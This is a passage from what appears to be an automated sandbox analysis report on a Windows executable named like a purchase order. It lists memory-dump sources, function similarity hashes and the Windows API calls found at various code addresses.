                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8d5ea1f57b3c7a51107eeb32950adad6d0a1e952e0bb086014bf19e576e1a16a
                                                        • Instruction ID: e1ca38fbe1868b0530a5cca2aefb0608b46060051e5a62990b8a86f9073b7715
                                                        • Opcode Fuzzy Hash: 8d5ea1f57b3c7a51107eeb32950adad6d0a1e952e0bb086014bf19e576e1a16a
                                                        • Instruction Fuzzy Hash: 61912370D04228CBDF28CF98C8547ADBBB1FF44305F14856AD856BB291C778AA86DF45
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2a4d9994a082143c1c144eb36683b4c65f38247d7a35d367480abefccda07661
                                                        • Instruction ID: c8babd12d4b9043659ede3bd230c10fd4be49189821a01af26e4b19fb55261c2
                                                        • Opcode Fuzzy Hash: 2a4d9994a082143c1c144eb36683b4c65f38247d7a35d367480abefccda07661
                                                        • Instruction Fuzzy Hash: B1813571D04228DBDF24CFA8C8847ADBBB1FF44305F24856AD456BB281C778AA86DF45
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b14ce6b3d8018a6f0b050b5be2694dad1ee6778a4c7b40431f4b258f42aa93ca
                                                        • Instruction ID: 70604387997e4686e0750d9790b47f8334db0f7ece30ebb4bbc07469160fd387
                                                        • Opcode Fuzzy Hash: b14ce6b3d8018a6f0b050b5be2694dad1ee6778a4c7b40431f4b258f42aa93ca
                                                        • Instruction Fuzzy Hash: A4816571D04228DBDF24CFA8C8447ADBBB0FF44315F20856AD856BB281C7786A86DF45
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e36820fe09b78ea4b76e3bf6ab2fb301930f737046964227b4143800bf5a8c7d
                                                        • Instruction ID: 95d77a19c0962547fc3f67c13c4944abdc30b9b20558c44938f244593de0d4a6
                                                        • Opcode Fuzzy Hash: e36820fe09b78ea4b76e3bf6ab2fb301930f737046964227b4143800bf5a8c7d
                                                        • Instruction Fuzzy Hash: 49713471D04228CBDF24CFA8C8847ADBBB1FF48305F15806AD856BB281C7386986DF45
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 06ef8f5a1822f0b757ae31e3b83f809751af444a1e9c2dfe7d230d3dce02f925
                                                        • Instruction ID: 33b9de73c5357426475d1ecb6718d507a7f793f52192090568aa5f1be2fe3f26
                                                        • Opcode Fuzzy Hash: 06ef8f5a1822f0b757ae31e3b83f809751af444a1e9c2dfe7d230d3dce02f925
                                                        • Instruction Fuzzy Hash: D8714671E04228CBDF28CF98C8847ADBBB1FF44305F15856AD856BB281C7786986DF45
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cfd14bdf320e39a62d2c2df30edf7cb1e1c63a24431ff8987f761f3d68dc011c
                                                        • Instruction ID: eebb37c65e2131d6119e05978ba22ffeb7e1a1a57c5d17d20a151e235b5fbeda
                                                        • Opcode Fuzzy Hash: cfd14bdf320e39a62d2c2df30edf7cb1e1c63a24431ff8987f761f3d68dc011c
                                                        • Instruction Fuzzy Hash: DD714771E04228DBEF28CF98C8447ADBBB1FF44305F15816AD856BB281C7786A86DF45
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 00403492
                                                          • Part of subcall function 004035FD: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FB,?), ref: 0040360B
                                                        • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A8,00000004,00000000,00000000,?,?,00403322,000000FF,00000000,00000000,00008001,?), ref: 004034C5
                                                        • SetFilePointer.KERNELBASE(?,00000000,00000000,00414EF0,00004000,?,00000000,004033A8,00000004,00000000,00000000,?,?,00403322,000000FF,00000000), ref: 004035C0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: FilePointer$CountTick
                                                        • String ID:
                                                        • API String ID: 1092082344-0
                                                        • Opcode ID: 1344b17e1481b80582bdb0ed23b8c3804af25e72a501c03e477dd398e9b7707c
                                                        • Instruction ID: 0007fe48f9bd4e0bdf6fbdcb7c574e60e63cda3bf49c02497359f5fe5cde5340
                                                        • Opcode Fuzzy Hash: 1344b17e1481b80582bdb0ed23b8c3804af25e72a501c03e477dd398e9b7707c
                                                        • Instruction Fuzzy Hash: C7319172600215EBC7309F29EE848163BADF744356755023BE501B26F1CBB5AE42DB9D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D6
                                                        • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E9
                                                        • RegCloseKey.ADVAPI32(?,?,?,distributed\Ristingets\,00000000,00000011,00000002), ref: 00402602
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: Enum$CloseValue
                                                        • String ID:
                                                        • API String ID: 397863658-0
                                                        • Opcode ID: d7c3bcff9e3486ffb53bc3915b5cff87963c4f43fcbf315e35984deb84fc55ed
                                                        • Instruction ID: 0e7c906900fe31acaf330cad7c7adc7318663c551a7f251ed3955534a0ac5e15
                                                        • Opcode Fuzzy Hash: d7c3bcff9e3486ffb53bc3915b5cff87963c4f43fcbf315e35984deb84fc55ed
                                                        • Instruction Fuzzy Hash: 3D017171904205ABEB149F949E58AAF7678FF40308F10443EF505B61C0DBB84E41976D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetFilePointer.KERNELBASE(00008001,00000000,00000000,00000000,00000000,?,?,00403322,000000FF,00000000,00000000,00008001,?), ref: 0040339B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: FilePointer
                                                        • String ID:
                                                        • API String ID: 973152223-0
                                                        • Opcode ID: 3d500f412808721b8c87be071932eede801725a1d128c96ac4c777ed30e32dcd
                                                        • Instruction ID: 810e563441ec60ddb2e304251acab09d4dc6a46a8481b8ea59e7f14a092257d1
                                                        • Opcode Fuzzy Hash: 3d500f412808721b8c87be071932eede801725a1d128c96ac4c777ed30e32dcd
                                                        • Instruction Fuzzy Hash: E231B170200209BFDB129F59DD44E9A3FA9EB04355F10843AF904EA191D3788E51DBA9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402560
                                                        • RegCloseKey.ADVAPI32(?,?,?,distributed\Ristingets\,00000000,00000011,00000002), ref: 00402602
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: CloseQueryValue
                                                        • String ID:
                                                        • API String ID: 3356406503-0
                                                        • Opcode ID: 3f9e4d0e37633bf98c355a218f283f93097903ae4b557426e4e4ad18f8810dd1
                                                        • Instruction ID: 56becb9136408d6600d44ef8ee1fb8662aacbb8094ba5771dc16c944e9e3e358
                                                        • Opcode Fuzzy Hash: 3f9e4d0e37633bf98c355a218f283f93097903ae4b557426e4e4ad18f8810dd1
                                                        • Instruction Fuzzy Hash: 39116D71900219EADF14DFA0DA589AE77B4BF04349F20447FE406B62C0D7B84A45EB5D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                        • SendMessageW.USER32(0040A230,00000402,00000000), ref: 004013F4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: 44422ec4cc38e602ea7d4d2f5f5b5ed5cf3abc39ac7d2c30bec0a520d1a14902
                                                        • Instruction ID: 4cdfa14fa51073ec67c7732ce5b449902c092ffb61bdcee16cd85da0f6320b18
                                                        • Opcode Fuzzy Hash: 44422ec4cc38e602ea7d4d2f5f5b5ed5cf3abc39ac7d2c30bec0a520d1a14902
                                                        • Instruction Fuzzy Hash: 0F01F4327212209BE7295B389D05B6B3698E710354F10863FF855F6AF1DA78CC429B4C
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • OleInitialize.OLE32(00000000), ref: 004057EA
                                                          • Part of subcall function 0040464D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040465F
                                                        • OleUninitialize.OLE32(00000404,00000000), ref: 00405836
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: InitializeMessageSendUninitialize
                                                        • String ID:
                                                        • API String ID: 2896919175-0
                                                        • Opcode ID: 6b48ba6f2f212ba91ce3a94f30354a0bb9d691122d035e2291a9dc674f3f10d0
                                                        • Instruction ID: 47b15979fd2771e4c3211fb1205fa32a21028b5b356e028cb2016eb217598776
                                                        • Opcode Fuzzy Hash: 6b48ba6f2f212ba91ce3a94f30354a0bb9d691122d035e2291a9dc674f3f10d0
                                                        • Instruction Fuzzy Hash: 9EF09073A006009AEB116B54AE01B6B77A4FBD4705F05843AEE84632A1DB794C128B9D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405C8E
                                                        • CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405C9B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateHandleProcess
                                                        • String ID:
                                                        • API String ID: 3712363035-0
                                                        • Opcode ID: dc4e0aa2a6e4d88c421582106c1d46ba955b2ae98b0244f92ff0ec2e2b298c3d
                                                        • Instruction ID: 40cf053be3b9956ee682ea3cdb0c0f8171e7446c395677da6238e6dd92eb787c
                                                        • Opcode Fuzzy Hash: dc4e0aa2a6e4d88c421582106c1d46ba955b2ae98b0244f92ff0ec2e2b298c3d
                                                        • Instruction Fuzzy Hash: A4E0BFB4600219BFFB109B64EE49F7B7B7CEB00648F418425BD14F2551D77498149A7C
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetModuleHandleA.KERNEL32(?,00000020,?,00403755,0000000C,?,?,?,?,?,?,?,?), ref: 00406A88
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00406AA3
                                                          • Part of subcall function 00406A06: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A1D
                                                          • Part of subcall function 00406A06: wsprintfW.USER32 ref: 00406A58
                                                          • Part of subcall function 00406A06: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A6C
                                                        Memory Dump Source
